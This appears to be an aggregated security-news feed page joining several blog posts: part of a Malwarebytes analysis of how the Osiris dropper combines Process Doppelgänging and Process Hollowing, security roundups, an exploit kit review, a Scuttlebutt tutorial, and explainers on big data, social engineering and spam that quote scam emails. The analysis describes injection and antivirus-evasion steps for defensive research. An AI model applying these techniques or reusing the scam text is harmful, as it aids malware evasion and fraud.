If this were typical Process Doppelgänging, this situation would never occur, and we would have the process created directly based on the section with the mapped payload. So, the question arises, how did the author of the dropper decide to merge the elements together at this point?

If we trace the execution, we can see following function being called, just after the transaction is rolled back (format: RVA;function):

4b1e6;ntdll_1.ZwQuerySection 4b22b;ntdll.NtClose 4b239;ntdll.NtClose 4aab8;ntdll_1.ZwMapViewOfSection 4af27;ntdll_1.ZwProtectVirtualMemory 4af5b;ntdll_1.ZwWriteVirtualMemory 4af8a;ntdll_1.ZwProtectVirtualMemory 4b01c;ntdll_1.ZwWriteVirtualMemory 4b03a;ntdll_1.ZwResumeThread

So, it looks like the newly created section is just mapped into the new process as an additional module. After writing the payload into memory and setting the necessary patches, such as Entry Point redirection, the process is resumed:

The way in which the execution was redirected looks similar to variants of Process Hollowing. The PEB of the remote process is patched, and the new module base is set to the added section. (Thanks to this, imports will get loaded automatically when the process resumes.)

The Entry Point redirection is, however, done just by a patch at the Entry Point address of the original module. A single jump redirects to the Entry Point of the injected module:

In case patching the Entry Point has failed, the loader contains a second variant of Entry Point redirection, by setting the new address in the thread context (ZwGetThreadContext -> ZwSetThreadContext), which is a classic technique used in Process Hollowing:

Best of both worlds

As we can see, the author merged some elements of Process Doppelgänging with some elements of Process Hollowing. This choice was not accidental. Both of those techniques have strong and weak points, but by merging them together, we get a power combo.

The weakest point of Process Hollowing is about the protection rights set on the memory space where the payload is injected (more info here). Process Hollowing allocates memory pages in the remote process by VirtualAllocEx, then writes the payload there. It gives one undesirable effect: the access rights (MEM_PRIVATE) were different than in the executable that is normally loaded (MEM_IMAGE).

Example of a payload loaded using Process Hollowing:

The major obstacle in loading the payload as an image is that, to do so, it has to be first dropped on the disk. Of course we cannot do this, because once dropped, it would easily be picked by an antivirus.

Process Doppelgänging on the other hand provides a solution: invisible transacted files, where the payload can be safely dropped without being noticed. This technique assumes that the transacted file will be used to create a section (MEM_IMAGE), and then this section will become a base of the new process (using NtCreateProcessEx).

Example of a payload loaded using Process Doppelgänging:

This solution works well, but requires that all the process parameters have to be also loaded manually: first creating them by RtlCreateProcessParametersEx and then setting them into the remote PEB. It was making it difficult to run a 32-bit process on 64-bit system, because in case of WoW64 processes, there are 2 PEBs to be filled.

Those problems of Process Doppelgänging can be solved easily if we create the process just like Process Hollowing does it. Rather than using low-level API, which was the only way to create a new process out of a section, the authors created a process out of the legitimate file, using a documented API from Kernel32. Yet, the section carrying the payload, loaded with proper access rights (MEM_IMAGE), can be added later, and the execution can get redirected to it.

Second stage loader

The next layer (8d58c731f61afe74e9f450cc1c7987be) is not the core yet, but the next stage of the loader. It imports only one DLL, Kernel32.

Its only role is to load the final payload. At this stage, we can hardly find something innovative. The Osiris core is unpacked piece by piece and manually loaded along with its dependencies into a newly-allocated memory area within the loader process.

After this self-injection, the loader jumps into the payload’s entry point:

The interesting thing is that the application’s entry point is different than the entry point saved in the header. So, if we dump the payload and try to run it interdependently, we will not get the same code executed. This is an interesting technique used to misguide researchers.

This is the entry point that was set in the headers is at RVA 0x26840:

The call leads to a function that makes the application go in an infinite sleep loop:

The real entry point, from which the execution of the malware should start, is at 0x25386, and it is known only to the loader.

The second stage versus Kronos loader

A similar trick using a hidden entry point was used by the original Kronos (2a550956263a22991c34f076f3160b49). In Kronos’ case, the final payload is injected into svchost. The execution is redirected to the core by patching the entry point in svchost:

In this case, the entry point within the payload is at RVA 0x13B90, while the entry point saved in the payload’s header (d8425578fc2d84513f1f22d3d518e3c3) is at 0x15002.

The code at the real Kronos entry point displays similarities with the analogical point in Osiris. Yet, we can see they are not identical:

A precision implementation

The first stage loader is strongly inspired by Process Dopplegänging and is implemented in a clean and professional way. The author adopted elements from a relatively new technique and made the best out of it by composing it with other known tricks. The precision used here reminds us of the code used in the original Kronos. However, we can’t be sure if the first layer is written by the same author as the core bot. Malware distributors often use third-party crypters to pack their malware. The second stage is more tightly coupled with the payload, and here we can say with more confidence that this layer was prepared along with the core.

Malwarebytes can protect against this threat early on by breaking its distribution chains that includes malicious documents sent in spam campaigns and drive-by downloads, thanks to our anti-exploit module. Additionally, our anti-malware engine detects both the dropper and Osiris core.

Indicators of Compromise (IOCs)

Stage 1 (original sample)

e7d3181ef643d77bb33fe328d1ea58f512b4f27c8e6ed71935a2e7548f2facc0

Stage 2 (second stage loader)

40288538ec1b749734cb58f95649bd37509281270225a87597925f606c013f3a

Osiris (core bot)

d98a9c5b4b655c6d888ab4cf82db276d9132b09934a58491c642edf1662e831e

The post Process Doppelgänging meets Process Hollowing in Osiris dropper appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 6 – August 12)

Malwarebytes - Mon, 08/13/2018 - 16:37

Last week, we published a review of exploit kits, talked about everyday tech that can give you a headache, and showed how to protect RDP access from ransomware. We also published a study on the true cost of cybercrime.

Other news:

Stay safe, everyone!

The post A week in security (August 6 – August 12) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Dweb: Social Feeds with Secure Scuttlebutt

Mozilla Hacks - Wed, 08/08/2018 - 16:01

In the series introduction, we highlighted the importance of putting people in control their social interactions online, instead of allowing for-profit companies be the arbiters of hate speech or harassment. Our first installment in the Dweb series introduces Secure Scuttlebutt, which envisions a world where users are in full control of their communities online.

In the weeks ahead we will cover a variety of projects that represent explorations of the decentralized/distributed space. These projects aren’t affiliated with Mozilla, and some of them rewrite the rules of how we think about a web browser. What they have in common: These projects are open source, and open for participation, and share Mozilla’s mission to keep the web open and accessible for all.

This post is written by André Staltz, who has written extensively on the fate of the web in the face of mass digital migration to corporate social networks, and is a core contributor to the Scuttlebutt project. –Dietrich Ayala

Getting started with Scuttlebutt

Scuttlebutt is a free and open source social network with unique offline-first and peer-to-peer properties. As a JavaScript open source programmer, I discovered Scuttlebutt two years ago as a promising foundation for a new “social web” that provides an alternative to proprietary platforms. The social metaphor of mainstream platforms is now a more popular way of creating and consuming content than the Web is. Instead of attempting to adapt existing Web technologies for the mobile social era, Scuttlebutt allows us to start from scratch the construction of a new ecosystem.

A local database, shared with friends

The central idea of the Secure Scuttlebutt (SSB) protocol is simple: your social account is just a cryptographic keypair (your identity) plus a log of messages (your feed) stored in a local database. So far, this has no relation to the Internet, it is just a local database where your posts are stored in an append-only sequence, and allows you to write status updates like you would with a personal diary. SSB becomes a social network when those local feeds are shared among computers through the internet or through local networks. The protocol supports peer-to-peer replication of feeds, so that you can have local (and full) copies of your friends’ feeds, and update them whenever you are online. One implementation of SSB, Scuttlebot, uses Node.js and allows UI applications to interact with the local database and the network stack.

Using Scuttlebot

While SSB is being implemented in multiple languages (Go, Rust, C), its main implementation at the moment is the npm package scuttlebot and Electron desktop apps that use Scuttlebot. To build your own UI application from scratch, you can setup Scuttlebot plus a localhost HTTP server to render the UI in your browser.

Run the following npm command to add Scuttlebot to your Node.js project:

npm install --save scuttlebot

You can use Scuttlebot locally using the command line interface, to post messages, view messages, connect with friends. First, start the server:

$(npm bin)/sbot server

In another terminal you can use the server to publish a message in your local feed:

$(npm bin)/sbot publish --type post --text "Hello world"

You can also consume invite codes to connect with friends and replicate their feeds. Invite codes are generated by pub servers
owned by friends in the community, which act as mirrors of feeds in the community. Using an invite code means the server will allow you to connect to it and will mirror your data too.

$(npm bin)/sbot invite.accept $INSERT_INVITE_CODE_HERE

To create a simple web app to render your local feed, you can start the scuttlebot server in a Node.js script (with dependencies ssb-config and pull-stream), and serve the feed through an HTTP server:

// server.js const fs = require('fs'); const http = require('http'); const pull = require('pull-stream'); const sbot = require('scuttlebot/index').call(null, require('ssb-config')); http .createServer((request, response) => { if (request.url.endsWith('/feed')) { pull( sbot.createFeedStream({live: false, limit: 100}), pull.collect((err, messages) => { response.end(JSON.stringify(messages)); }), ); } else { response.end(fs.readFileSync('./index.html')); } }) .listen(9000);

Start the server with node server.js, and upon opening localhost:9000 in your browser, it should serve the index.html:

<html> <body> <script> fetch('/feed') .then(res => res.json()) .then(messages => { document.body.innerHTML = ` <h1>Feed</h1> <ul>${messages .filter(msg => msg.value.content.type === 'post') .map(msg => `<li>${msg.value.author} said: ${msg.value.content.text}</li>` ) }</ul> `; }); </script> </body> </html> Learn more

SSB applications can accomplish more than social messaging. Secure Scuttlebutt is being used for Git collaboration, chess games, and managing online gatherings.

You build your own applications on top of SSB by creating or using plug-ins for specialized APIs or different ways of querying the database. See secret-stack for details on how to build custom plugins. See flumedb for details on how to create custom indexes in the database. Also there are many useful repositories in our GitHub org.

To learn about the protocol that all of the implementations use, see the protocol guide, which explains the cryptographic primitives used, and data formats agreed on.

Finally, don’t miss the frontpage Scuttlebutt.nz, which explains the design decisions and principles we value. We highlight the important role that humans have in internet communities, which should not be delegated to computers.

The post Dweb: Social Feeds with Secure Scuttlebutt appeared first on Mozilla Hacks - the Web developer blog.

Categories: Techie Feeds

Exploit kits: summer 2018 review

Malwarebytes - Tue, 08/07/2018 - 15:00

The uptick trend in cybercriminals using exploit kits that we first noticed in our spring 2018 report has continued into the summer. Indeed, not only have new kits been found, but older ones are still showing signs of life. This has made the summer quarter one of the busiest we’ve seen for exploits in a while.

Perhaps one caveat is that, apart from the RIG and GrandSoft exploit kits, we observe the majority of EK activity contained in Asia, maybe due to a greater likelihood of encountering vulnerable systems in that region. Malware distributors have complained that “loads” for the North American or European markets are too low via exploit kit, but other areas are still worthy targets.

In addition, we have witnessed many smaller and unsophisticated attackers using one or two exploits bluntly embedded in compromised websites. In this era of widely-shared exploit proof-of-concepts (PoCs), we are starting to see an increase in what we call “pseudo-exploit kits.” These are drive-by downloads that lack proper infrastructure and are typically the work of a lone author.

In this post, we will review the following exploit kits:

CVEs

Two newly found vulnerabilities in 2018, Internet Explorer’s CVE-2018-8174 and Flash’s CVE-2018-4878, have been widely adopted and represent the only real attack surface at play. Nevertheless, some kits are still using older exploits in technologies that are being retired, and most likely with little efficacy.

RIG EK

RIG EK remains quite active in malvertising campaigns and compromised websites, and is one of the few exploit kits with a wider geographic presence. It is pictured below in what we call the HookAds campaign, delivering the AZORult stealer.

GrandSoft EK

GrandSoft is probably the second most active exploit kit with a backend infrastructure that is fairly static in comparison to RIG. Interestingly, both EKs can sometimes be seen sharing the same distribution campaigns, as pictured below:

Magnitude EK

Magnitude, the South Korean–focused EK, keeps delivering its own strain of ransomware (Magniber). We documented changes in Magniber in recent weeks with some code improvements, as well as a wider casting net among several Asian countries.

GreenFlash Sundown EK

A sophisticated but more elusive EK focusing on Flash’s CVE-2018-4878, GreenFlash Sundown is still active in parts of Asia thanks to a network of compromised OpenX ad servers. We haven’t seen any major changes since the last time we profiled it, and it is still distributing the Hermes ransomware.

KaiXin EK

KaiXin EK (also known as CK VIP) is an older exploit kit of Chinese origin, which has maintained its activity over the years. It is unique for the fact that it uses a combination of old (Java) and new vulnerabilities. When we captured it, we noted that it pushed the Gh0st RAT (Remote Access Trojan).

Underminer EK

Although this exploit kit was only identified and named recently, it has been around since at least November 2017 (perhaps with only limited distribution to the Chinese market). It is an interesting EK from a technical perspective with, for example, the use of encryption to package its exploit and prevent offline replays using traffic captures.

Another out-of-the-ordinary aspect of Underminer is its payload, which isn’t a packaged binary like others, but rather a set of libraries that install a bootkit on the compromised system. By altering the device’s Master Boot Record, this threat can launch a cryptominer every time the machine reboots.

Pseudo-EKs

Many exploit packs have leaked and been poached over the years, notwithstanding the availability of a large number of other dumps (i.e. HackingTeam) or proofs-of-concept. As a result, it is not surprising to see many less-skilled actors putting together their own “pseudo-exploit kits.” They are a far cry from being an EK—they are usually static in nature, their copy/paste exploits are buggy, and consequently, they are only used by the same threat actor in limited distribution. The pseudo-exploit we picture below (offensive domain name has been blurred) is one of the better ones we saw in July, in particular for its use of CVE-2018-8174.

Mitigation

We are continuously checking drive-by download attacks against our software. This time around, we had a more extensive test bed thanks to new and old exploit kits making it into this summer edition. Malwarebytes continues to block exploit kits with different layers of technology to protect our customers.

Don’t call it a comeback

It seems as though talking about the demise of exploit kits triggered an opposite reaction. Certainly, some digging is required to encounter the more obscure or geo-focused toolkits, but this revival of sorts continues thanks to Internet Explorer’s—and to a lesser extent Flash’s—newly found vulnerabilities.

While IE has a small and decreasing global market share (7 percent), it still has an important presence in countries like South Korea (31 percent) or Japan (18 percent), which could explain why there is still notable activity in a few select regions.

Exploit kits, even in a reduced and less impactful form, are likely to stick around for a while, at least for as long as people use a browser that wants to latch on indefinitely.

The post Exploit kits: summer 2018 review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (July 30 – August 5)

Malwarebytes - Mon, 08/06/2018 - 16:07

Last week, we posted a roundup of spam that may have landed in your mailbox, talked about what makes us susceptible to social engineering tactics, and took a deep dive into big data.

Other news:
  • Facebook claimed to have removed accounts that display behavior consistent with possible Russian actors engaged in misinformation. (Source: The Wall Street Journal)
  • Yale University disclosed that they were breached at least a decade ago. (Source: NBC – Connecticut)
  • High school students, be on the lookout! If you receive email or snail mail from organizations with impressive-sounding names, consider that it may just be a carefully packaged marketing scheme. (Source: Sophos’s Naked Security Blog)
  • A researcher from Amnesty International revealed that hackers have targeted them with malware from an Israeli vendor. (Source: Motherboard)
  • Certain e-commerce providers in the UK were affected by a data breach and exposed potentially more than a million user data. (Source: Graham Cluley’s blog)
  • A game on the Steam platform was found hijacking video game player machines to mine cryptocurrency. (Source: Motherboard)
  • The Alaskan Borough of Matanuska-Susitna was infected with malware that disrupted normal activities so much that they had to dust off old typewriters to continue issuing receipts. (Source: Sophos’s Naked Security blog)
  • While we’re on the subject of breaches, here’s another popular victim: Reddit. (Source: TechCrunch)
  • Google joined Apple in banning mining apps on the Play Store. (Source: Coin Central)
  • An independent security researcher from the UK spotted a DHL-themed spam carrying malware hidden in a GIF file. (Source: The SANS ISC InfoSec Forums)

Stay safe, everyone!

The post A week in security (July 30 – August 5) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: What is big data?

Malwarebytes - Fri, 08/03/2018 - 15:00

If the pile of manure is big enough, you will find a gold coin in it eventually. This saying is used often to explain why anyone would use big data. Needless to say, in this day and age, the piles of data are so big, you might end up finding a pirate’s treasure.

How big is the pile?

But when is the pile big enough to consider it big data? Per Wikipedia:

“Big data is data sets that are so big and complex that traditional data-processing application software are inadequate to deal with them.”

As a consequence, we can say that it’s not just the size that matters, but the complexity of a dataset. The draw of big data to researchers and scientists, however, is not in its size or complexity, but in how it may be computationally analyzed to reveal patterns, trends, and associations.

When it comes to big data, no mountain is high enough or too difficult to climb. The more data we have to analyze, the more relevant conclusions we may be able to derive. If a dataset is large enough, we can start making predictions about how certain relationships will develop in the future and even find relationships we never suspected to exist.

The treasure

We mentioned predicting the future or finding advantageous correlations as possible reasons for using big data analysis. Just to name a few examples, big data could be used to set up profiles and processes for the following:

  • Stop terrorist attacks by creating profiles of likely attackers and their methods.
  • More accurately target customers for marketing initiatives using individual personas.
  • Calculate insurance rates by building risk profiles.
  • Optimize website user experiences by creating and monitoring visitor behavior profiles.
  • Analyze workflow charts and processes to improve business efficiency.
  • Improve city planning by analyzing and understanding traffic patterns.
Beware of apophenia

Apophenia is the tendency to perceive connections and meaning between unrelated things. What statistical analysis might show to be a correlation between two facts or data streams could simply be a coincidence. There could be a third factor at play that was missed, or the data set might be skewed. This can lead to false conclusions and to actions being undertaken for the wrong reasons.

For example, analysis of data collected about medical patients could lead to the conclusion that those with arthritis also tend to have high blood pressure. When in reality, the most popular medication to treat arthritis lists high blood pressure as a side effect. Remember the old research edict: correlation does not equal causation.

In statistics, we call this a type I error, and it’s the feeding ground for many myths, superstitions, and fallacies.

The researchers

As more and more data becomes digitized and stored, the need for big data analysts grows. A recent study showed that 53 percent of the companies interviewed were using big data in one way or another. Some examples of use cases for big data include:

  • Data warehouse optimization (considered the top use case for big data)
  • Analyzing patterns in employee satisfaction; for example, in multinational companies, a 0.1 percent increase in turnover is considered too high
  • Sports statistics and analysis; sometimes the difference between being the champion or coming in second comes down to the tiniest detail
  • Prognosis statistics or success rates of particular medications can influence a doctor’s recommended course of treatment; an accurate assessment of which could be the difference between life and death
  • Selecting stocks for purchase and trade; quick decision-making based on analytical algorithms gives traders the edge

At Malwarebytes, we use big data in the form of anonymous telemetry gathered from our users (those that allow it) to monitor active threats. Viewing these data sets allows us to see trends in malware development, from the types of malware that are being used in the wild to the geographic locations of attacks.

From these data, we’re able to draw conclusions and share valuable information on the blog, in reports, such as our quarterly Cybercrime Tactics and Techniques report, and even in heat maps like the one we created for WannaCry. (As our product detected WannaCry even before we added definitions, this gave us some valuable information about where it might have originated.)

The tools

Technologically, the tools you will need to analyze big data depend on a few variables:

  • How is the data organized?
  • How big is big?
  • How complex is the data?

When we are looking at the organization of data, we are not just focusing on the structure and uniformity of the data, but the location of the data as well. Are they spread over several servers, completely or partially in the cloud, or are they all in one place?

Obviously, uniformity makes data easier to compare and manipulate, but we don’t always have that luxury. And it takes powerful and smart statistical tools to make sense out of polymorphous or differently-structured datasets.

As we have seen before, the complexity of the data can be another reason why we need special big data tools, even if the sheer number is not that large.

As big data tools are made available, they are still in the early stages of development and not all of them are ready for intuitive use. It requires knowledge and familiarity to use them most effectively. That is where personal preference comes in. Using a tool you have experience with is always easier, at least at first.

Our personal data

When we go online, we leave a trail of data behind that can be used by marketers (and criminals) to profile us and our environment. This makes us predictable to a certain extent. Marketeers love this type of predictability, as it enables them to figure out what they can sell us, how much of it, and at which price. If you’ve ever wondered how you saw an ad for vintage sunglasses on Facebook when you were only searching on Google, the answer is big data.

Imagine a virtual assistant that retrieves travel arrangement information at your first whim of considering a vacation. Hotels, flights, activities, food and drink—all could be listed to your liking, in your favorite locations, and in your price range at the blink of an eye. Some may find this scary, others would consider it convenient. However you feel, the virtual assistant is able to do this because of the big data it collects on you and your behavior online.

The data-driven society

One of the major contributions of big data to our society will be through the Internet of Things (IoT). IoT represents the most direct link between the physical world and the cyber world we’ve experienced yet. These cyber-physical systems will of course be shaped by the objects and software we create for them, but their biggest influence will be the result of algorithms applied to the data they collect.

With the evolution of these systems, we can expect to evolve into a data-driven society, where big data plays a major role in adjusting the production to meet our expected needs. This is an area where we will need safeguards in the future to prevent big data from turning into Big Brother.

Big data, big breaches

The obvious warning here is that gathering and manipulating big data require extra attention paid to security and privacy, especially when the data are worth stealing. While raw datasets may seem like a low-risk asset, those who know how to find the gold (cyber)coin in the pile of manure will see otherwise. With the advent of GDPR in May, any form of personally identifiable information (PII) will be sought after with great urgency, as the safeguards put in place to protect PII place endanger the lively black market trade set up around it.

The lesson, then, is to take seriously big data’s impact, both for good and for evil. Perhaps the whole pile should be considered the treasure.

The post Explained: What is big data? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Social engineering attacks: What makes you susceptible?

Malwarebytes - Thu, 08/02/2018 - 15:00

We now live in a world where holding the door open for someone balancing a tray of steaming hot coffee—she can’t seem to get her access card out to place it near the reader—is something we need to think twice about. Courtesy isn’t dead, mind you, but in this case, you’d almost wish it were. Because the door opens to a restricted facility. Do you let her in? If she really can’t reach her card, the answer is clearly yes. But what if there’s something else going on?

Holding the door open for people in need of assistance is considered common courtesy. But when someone assumes the role of a distressed woman to count on your desire to help, your thoughtful gesture suddenly becomes a dangerous one. Now, you’ve just made it easier for someone to get into a restricted facility they otherwise had no access or right to. So what does that make you? A victim of social engineering.

Social engineering is a term you often hear IT pros and cybersecurity experts use when talking about Internet threats like phishing, scams, and even certain kinds of malware, such as ransomware. But its definition is even more broad. Social engineering is the manipulation or the taking advantage of human qualities to serve an attacker’s purpose.

It is imperative, then, that we protect ourselves from such social engineering tactics the same way we protect our devices from malware. With due diligence, we can make it difficult for social engineers to get what they want.

Know thy vulnerable self

Before we go into the “how” of things, we’d like to lay out other human emotional and psychological aspects that a social engineer can use to their advantage (and the potential target’s disadvantage). These include emotions such as sympathy, which we already touched on above. Other traits open for vulnerability are as follows:

Carelessness

The majority of us have accidentally clicked a link or two, or opened a suspicious email attachment. And depending on how quickly we were able to mitigate such an act, the damage done could range from minor to severe and life-changing.

Examples of social engineering attacks that take advantage of our carelessness include:

Curiosity

You seem to have received an email supposedly for someone else by accident, and it’s sitting in your inbox right now. Judging from the subject line, it’s a personal email containing photos from the sender’s recent trip to the Bahamas. The photos are in a ZIP-compressed file.

If at this point you start to debate with yourself on whether you should open the attachment or not, even if it wasn’t meant for you, then you may be susceptible to a curiosity-based social engineering attack. And we’ve seen a lot of users get duped by this approach.

Examples of curiosity-based attacks include:

Fear

According to Charles E. Lively, Jr. in the paper “Psychological-Based Social Engineering,” attacks that play on fear are usually the most aggressive form of social engineering because it pressures the target to the point of making them feel anxious, stressed, and frightened.

Such attacks make participants willing do anything they’re asked to do, such as send money, intellectual property, or other information to the threat actor, who might be posing as a member of senior management or holding files hostage. Campaigns of this nature typically exaggerate on the importance of the request and use a fictitious deadline. Attackers do this in the hopes that they get what they ask for before the deception is uncovered.

Examples of fear-based attacks include

Read: Fake Spectre and Meltdown patch pushes Smoke Loader malware

Desire

Whether for convenience, recognition, or reward, desire is a powerful psychological motivation that can affect one’s decision making, regardless of whether you’re seen as an intellectual or not. Blaise Pascal said it best: “The heart has its reasons which the mind knows nothing of.” People looking for the love of their lives, more money, or free iPhones are potentially susceptible to this type of attack.

Examples of desire-based attacks include:

  • Catfishing/romance fraud (members of the LGBTQ community aren’t exempt)
  • Catphishing
  • Certain phishing campaigns
  • Scams that bait you with money or gadgets (e.g. 419 or Nigerian Prince scams, survey scams)
  • Lottery and gambling-related scams
  • Quid pro quo
Doubt

This is often coupled with uncertainty. And while doubt can sometimes stop us from doing something we would have regretted, it can also be used by social engineers to blindside us with information that potentially casts something, someone, or an idea in a bad light. In turn, we may end up suspecting who or what we think we know is legit and trusting the social engineer more.

One Internet user shared her experience with two fake AT&T associates who contacted her on the phone after she received an SMS report of changes to her account. She said that the first purported associate was clearly fake, getting defensive and hanging up on her when she questioned if this was a scam. But the second associate gave her pause, as the caller was calm and kind, making her think twice if he was indeed a phony associate or not. Had she given in, she would have been successfully scammed.

Examples of doubt-based attacks include:

  • Apple iTunes scams
  • Payment-based scams
  • Payment diversion fraud
  • Some forms of social hacking, especially in social media
Empathy and sympathy

When calamities and natural disasters strike, one cannot help but feel the need to extend aid or relief. As most of us cannot possibly hop on a plane or chopper and race to affected areas to volunteer, it’s significantly easier to go online, enter your card details to a website receiving donations, and hit “Enter.” Of course, not all of those sites are real. Social engineers exploit the related emotions of empathy and sympathy to grossly funnel funds away from those who are actually in need into their own pockets.

Examples of sympathy-based scams include:

Read: Crowdsourced fraud and kickstarted scams

Ignorance or naiveté

This is probably the human trait most taken advantage of and, no doubt, one of the reasons why we say that cybersecurity education and awareness are not only useful but essential. Suffice to say, all of the social engineering examples we mention in this post rely in part on these two characteristics.

While ignorance is often used to describe someone who is rude or prejudice, in this context it means someone who lacks knowledge or awareness—specifically of the fact that these forms of crime exist on the Internet. Naiveté also highlights users’ lack of understanding of how a certain technology or service works.

On the flip side, social engineers can also use ignorance to their advantage by playing dumb in order to get what they want, which is usually information or favors. This is highly effective, especially when used with flattery and the like.

Other examples of attacks that prey on ignorance include:

  • Venmo scams
  • Amazon gift card scams
  • Cryptocurrency scams
Inattentiveness or complacency

If we’re attentive enough to ALT+TAB away from what we’re looking at when someone walks in the room, theoretically we should be attentive enough to “go by-the-book” and check that person’s proof of identity. Sounds simple enough, and it surely is, yet many of us yield to giving people a pass if we think that getting confirmation gets in the way. Social engineers know this, of course, and use it to their advantage.

Examples of complacency-based attacks include:

  • Physical social engineering attempts, such as gaining physical access to restricted locations and dumpster diving
  • Pretexting
  • Diversion theft

Sophisticated threat actors behind noteworthy social engineering campaigns such as BEC and phishing use a combination of attacks, targeting two or more emotional and psychological traits and one or more people.

Whether the person you’re dealing with is online, on the phone, or face-to-face, it’s important to be on alert, especially when our level of skepticism hasn’t yet been tuned to detect social engineering attempts.

Brain gyming: combating social engineering

Thinking of ways to counter social engineering attempts can be a challenge. But many may not realize that using basic cybersecurity hygiene can also be enough to deter social engineering tactics. We’ve touched on some of them in previous posts, but here, we’re adding more to your mental arsenal of prevention tips. Our only request is you use them liberally when they apply to your circumstance.

Email
  • If bearing a dubious link or attachment, reach out and verify with the sender (in person or via other means of communication) if they have indeed sent you such an email. You can also do this to banks and other services you use when you receive an email reporting that something happened with your account.
  • Received a request from your boss to wire money to him ASAP? Don’t feel pressured. Instead, give him a call to verify if he sent that request. It would also be nice to confirm that you are indeed talking with your boss and not someone impersonating him/her.
Phone (landline or smartphone)
  • When you receive a potentially scammy SMS from your service provider, call them directly instead of replying via text and ask if something’s up.
  • Refrain from answering calls not in your contact list and other numbers you don’t recognize, especially if they appear closely related to your own phone number. (Scammers like to spoof area codes and the first three digits of your phone to trick you into believing it’s from someone you know.)
  • Avoid giving out information to anyone directly or indirectly. Remind yourself that volunteering what you know is what the social engineers are heavily counting on.
  • Apply the DTA (Don’t Trust Anyone) or the Zero Trust rule. This means you treat every unsolicited call as a scam and ask tough questions. Throw the caller off by providing false information.
  • If something doesn’t feel right, hang up, and look for information online about the nature of the call you just received. Someone somewhere may have already experienced it and posted about it.
In person
  • Be wary when someone you just met touches you. In the US, touch is common with friends and family members, not with people you don’t or barely know.
  • If you notice someone matching your quirks or tendencies, be suspicious of their motives.
  • Never give or blurt out information like names, department names, and other information known only within your company when in the common area of your office building. Remind yourself that in your current location, it is easy to eavesdrop and to be eavesdropped on. Mingle with other employees from different companies if you like, but be picky and be as vague as possible with what you share. It also pays to apply the same cautious principle when out in public with friends in a bar, club, or restaurant.
  • Always check for identification and/or other relevant papers to identify persons and verify their purpose for being there.
Social media
  • Refrain from filling in surveys or playing games that require you to log in using a social media account. Many phishing attempts come in these forms, too.
  • If you frequent hashtagged conversations (on Twitter, for example), consider not clicking links from those who are sharing, as you have no idea whether the links take you to destinations you want. More importantly, we’re not even sure if those sharing the link are actual people and not bots created to go after the low hanging fruit.
  • If you receive a private message on your social network inbox—say on LinkedIn—with a link to a job offer, it’s best to visit the company’s official website and look up open positions there. If you have clicked the link and the site asks you to fill in your details, close the tab.
A happy smart ending

When it comes to social engineering, no incident is too small to be neglected. There is no harm in erring on the side of safety.

So, what should you do if someone is behind you carrying a tray of hot coffee and can’t get to her access card? Don’t open the door for her. Instead, you can offer to hold her tray while she takes out and uses her access card. If you still think this is a bad idea, then tell her to wait while you go inside and get security to help her out. Of course, this is assuming that security, HR, and the front desk have already been trained to respond forcefully against someone trying to social engineer their way in.

Good luck!

The post Social engineering attacks: What makes you susceptible? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What’s in the spam mailbox this week?

Malwarebytes - Tue, 07/31/2018 - 15:00

We’ve seen a fair few spam emails in circulation this week, ranging from phishing to money muling to sexploitation. Shall we take a look?

The FBI wants to give you back your money

First out of the gate, we have a missive claiming to be from the FBI. Turns out you lost a huge sum of money that you somehow don’t have any recollection of, and now the FBI wants to give it back to you via Western Union.

Sounds 100 percent legit, right? Here’s the email. See what you think:

Attn: Beneficiary

After proper and several investigations and research at Western
Union and Money Gram Office, we found your name in Western Union
database among those that have sent money through Western Union
and this proves that you have truly been swindled by those
unscrupulous persons by sending money to them through Western
Union/Money Gram in the course of getting one fund or the other
that is not real.

In this regard a meeting was held between the Board of Directors
of WESTERN UNION, MONEYGRAM, the FBI alongside with the Ministry
of Finance, As a consequence of our investigations it was agreed
that the sum of One Million Five Hundred Thousand United States
Dollars (U.S.1,500,000.00) should be transferred to you out from
the funds that The United States Department of the Treasury has
set aside as compensation payment for scam victims.

This case would be handled and supervised by the FBI. We have
submitted your details to them so that your funds can be
transferred to you. Contact the Western Union agent office
through the information below:

Contact Person: Graham Collins
Address: Western Union Post Office, California
Email: westernunionofficemail0012@[redacted]

Yours sincerely,
Christopher A. Wray
FBI Director

Sadly, the FBI are not going to discover you’re owed millions of dollars then send you off to deal with a Western Union rep to reclaim it. Additionally, a quick search on multiple portions of the text will reveal parts of the above message dating back many years. It’s a common scam tactic to lazily grab whatever text is available then reword it a little bit for a fresh sheen. For example, here’s one from 2013 that came with a malicious executable attachment.

This one has no such nasties lurking, but someone could still be at risk of falling into a money mule scam, or losing a ton of cash from getting involved. The good news is that ancient text reuse tends to send up the spam filter flags for most email clients, so if you do come across this, there’s a good chance it’ll be stuffed inside your spam bin where it belongs. If it’s in there, hammer the delete button and forget about it.

Let’s go Apple phishing

Next up, a pair of Apple phishes:

Click to enlarge

The first links to a site that’s currently offline, but does try to bait potential victims with a fake transaction for a set of $299 headphones:

Click to enlarge

As with most of these scams, they’re hoping you’ll see the amount supposedly paid, then run to the linked site and fill in the phishing form.

The text from the second one reads as follows:

Your Apple ID has been Locked
This Apple ID [EMAIL ADDRESS] has been locked for security reasons.

It looks like your account is outdated and requires updated account ownership information so we can protect your account and improve our services to maintain your privacy.

To continue using the Apple ID service, we advise you to update the information about your account ownership.

Update Account Apple ID
For the security of your account, we advise not to notify your account password to anyone. If you have problems updating your account, please visit Apple Support.

A clickable link leads to the below phishing site located at appelid(dot)idnotice(dot)info-account-update-limiteds(dot)com:

Click to enlarge

Upon entering a username and password, the site claims the account has been locked and needs to be set back to full health.

Click to enlarge

Potential victims are directed to a page asking for name, address, DOB, payment information, and a variety of selectable security questions.

Click to enlarge

We don’t want anybody handing over personal information to scam mails such as the above, much less any fake login portals further down the chain. Always be cautious when seeing wild claims of payments and mysterious orders you have no recollection of; the name of the game is not so much panic buying as panic clicking, and that can lead to only one thing: hours spent dealing with the customer support section of shopping portals or your bank.

Sexploitation, Bitcoin, and old passwords

Speaking of mysterious behavior you have no recollection of participating in, a recent, massive phish email first hooks users by divulging their real, former password in the subject line, and then telling said recipients they’ve been caught on camera looking at porn and, um, doing other stuff.

